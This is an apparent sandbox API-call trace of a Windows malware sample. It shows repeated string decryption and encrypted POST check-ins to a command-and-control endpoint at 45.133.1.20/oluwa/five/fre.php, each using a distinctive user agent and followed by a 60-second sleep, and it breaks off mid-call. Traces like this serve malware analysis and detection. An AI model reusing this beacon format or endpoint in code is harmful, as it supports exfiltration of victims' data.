0x6b4d48 [0190.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.603] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.612] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0190.649] GetProcessHeap () returned 0x6a0000 [0190.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0190.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.651] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0190.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.652] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.654] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.654] GetProcessHeap () returned 0x6a0000 [0190.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0190.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.659] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0190.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.661] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0190.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.678] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0190.678] GetProcessHeap () returned 0x6a0000 [0190.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0190.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.679] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0190.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.680] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0190.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.681] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0190.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.683] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0190.683] GetProcessHeap () returned 0x6a0000 [0190.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0190.683] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0190.683] GetProcessHeap () returned 0x6a0000 [0190.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0190.684] GetProcessHeap () returned 0x6a0000 [0190.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0190.684] GetProcessHeap () returned 0x6a0000 [0190.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0190.687] GetProcessHeap () returned 0x6a0000 [0190.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0190.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.689] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.698] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0190.711] GetProcessHeap () returned 0x6a0000 [0190.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0190.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.712] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0190.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.714] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.715] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.715] GetProcessHeap () returned 0x6a0000 [0190.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0190.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.719] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0190.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.721] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0190.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.722] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0190.722] GetProcessHeap () returned 0x6a0000 [0190.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0190.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.723] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0190.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.725] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0190.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.726] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0190.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.727] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0190.727] GetProcessHeap () returned 0x6a0000 [0190.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0190.727] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0190.727] GetProcessHeap () returned 0x6a0000 [0190.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0190.728] socket (af=2, type=1, protocol=6) returned 0x48c [0190.728] connect (s=0x48c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0190.765] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0190.765] GetProcessHeap () returned 0x6a0000 [0190.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0190.765] GetProcessHeap () returned 0x6a0000 [0190.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0190.767] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0190.768] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0190.768] GetProcessHeap () returned 0x6a0000 [0190.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0190.768] GetProcessHeap () returned 0x6a0000 [0190.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0190.769] GetProcessHeap () returned 0x6a0000 [0190.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0190.769] GetProcessHeap () returned 0x6a0000 [0190.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0190.770] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0190.771] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0190.771] GetProcessHeap () returned 0x6a0000 [0190.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0190.771] GetProcessHeap () returned 0x6a0000 [0190.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0190.772] send (s=0x48c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0190.773] send (s=0x48c, buf=0x6bb998*, len=159, flags=0) returned 159 [0190.773] GetProcessHeap () returned 0x6a0000 [0190.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0190.773] recv (in: s=0x48c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0190.841] GetProcessHeap () returned 0x6a0000 [0190.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0190.843] GetProcessHeap () returned 0x6a0000 [0190.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0190.843] GetProcessHeap () returned 0x6a0000 [0190.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0190.844] GetProcessHeap () returned 0x6a0000 [0190.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0190.844] closesocket (s=0x48c) returned 0 [0190.845] GetProcessHeap () returned 0x6a0000 [0190.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0190.845] GetProcessHeap () returned 0x6a0000 [0190.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0190.846] GetProcessHeap () returned 0x6a0000 [0190.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0190.846] GetProcessHeap () returned 0x6a0000 [0190.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0190.847] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1220) returned 0x48c [0190.865] Sleep (dwMilliseconds=0xea60) [0190.866] GetProcessHeap () returned 0x6a0000 [0190.866] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0190.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.868] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.876] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0190.888] GetProcessHeap () returned 0x6a0000 [0190.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6bfcc8 [0190.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.889] CryptImportKey (in: hProv=0x6bf278, pbData=0x6bfcc8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0190.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.895] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.896] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.896] GetProcessHeap () returned 0x6a0000 [0190.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bfcc8 | out: hHeap=0x6a0000) returned 1 [0190.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.898] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0190.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.899] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0190.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.900] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0190.900] GetProcessHeap () returned 0x6a0000 [0190.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0190.901] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.902] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0190.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.903] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0190.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.904] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0190.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.906] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0190.906] GetProcessHeap () returned 0x6a0000 [0190.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0190.906] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0190.907] GetProcessHeap () returned 0x6a0000 [0190.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0190.907] GetProcessHeap () returned 0x6a0000 [0190.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0190.907] GetProcessHeap () returned 0x6a0000 [0190.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0190.907] GetProcessHeap () returned 0x6a0000 [0190.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0190.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.908] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0190.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.914] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0190.921] GetProcessHeap () returned 0x6a0000 [0190.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0190.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.923] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0190.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.924] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0190.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.925] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0190.925] GetProcessHeap () returned 0x6a0000 [0190.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0190.926] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.926] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0190.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.927] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0190.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0190.928] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0190.928] GetProcessHeap () returned 0x6a0000 [0190.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0190.929] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.929] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0190.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.930] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0190.931] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.931] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0190.932] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0190.932] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0190.932] GetProcessHeap () returned 0x6a0000 [0190.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0190.932] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0190.932] GetProcessHeap () returned 0x6a0000 [0190.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0190.932] socket (af=2, type=1, protocol=6) returned 0x490 [0190.933] connect (s=0x490, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0190.973] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0190.973] GetProcessHeap () returned 0x6a0000 [0190.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0190.973] GetProcessHeap () returned 0x6a0000 [0190.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0190.974] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0190.975] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0190.975] GetProcessHeap () returned 0x6a0000 [0190.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0190.975] GetProcessHeap () returned 0x6a0000 [0190.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0190.976] GetProcessHeap () returned 0x6a0000 [0190.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0190.976] GetProcessHeap () returned 0x6a0000 [0190.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0190.976] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0190.977] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0190.977] GetProcessHeap () returned 0x6a0000 [0190.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0190.977] GetProcessHeap () returned 0x6a0000 [0190.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0190.978] send (s=0x490, buf=0x6b5c98*, len=242, flags=0) returned 242 [0190.979] send (s=0x490, buf=0x6bb998*, len=159, flags=0) returned 159 [0190.979] GetProcessHeap () returned 0x6a0000 [0190.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0190.979] recv (in: s=0x490, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0191.080] GetProcessHeap () returned 0x6a0000 [0191.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0191.082] GetProcessHeap () returned 0x6a0000 [0191.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0191.082] GetProcessHeap () returned 0x6a0000 [0191.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0191.082] GetProcessHeap () returned 0x6a0000 [0191.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0191.083] closesocket (s=0x490) returned 0 [0191.083] GetProcessHeap () returned 0x6a0000 [0191.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0191.083] GetProcessHeap () returned 0x6a0000 [0191.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0191.084] GetProcessHeap () returned 0x6a0000 [0191.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0191.085] GetProcessHeap () returned 0x6a0000 [0191.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0191.085] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1234) returned 0x490 [0191.087] Sleep (dwMilliseconds=0xea60) [0191.089] GetProcessHeap () returned 0x6a0000 [0191.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0191.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.091] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.110] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0191.118] GetProcessHeap () returned 0x6a0000 [0191.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c0088 [0191.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0191.120] CryptImportKey (in: hProv=0x6bef48, pbData=0x6c0088, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0191.120] 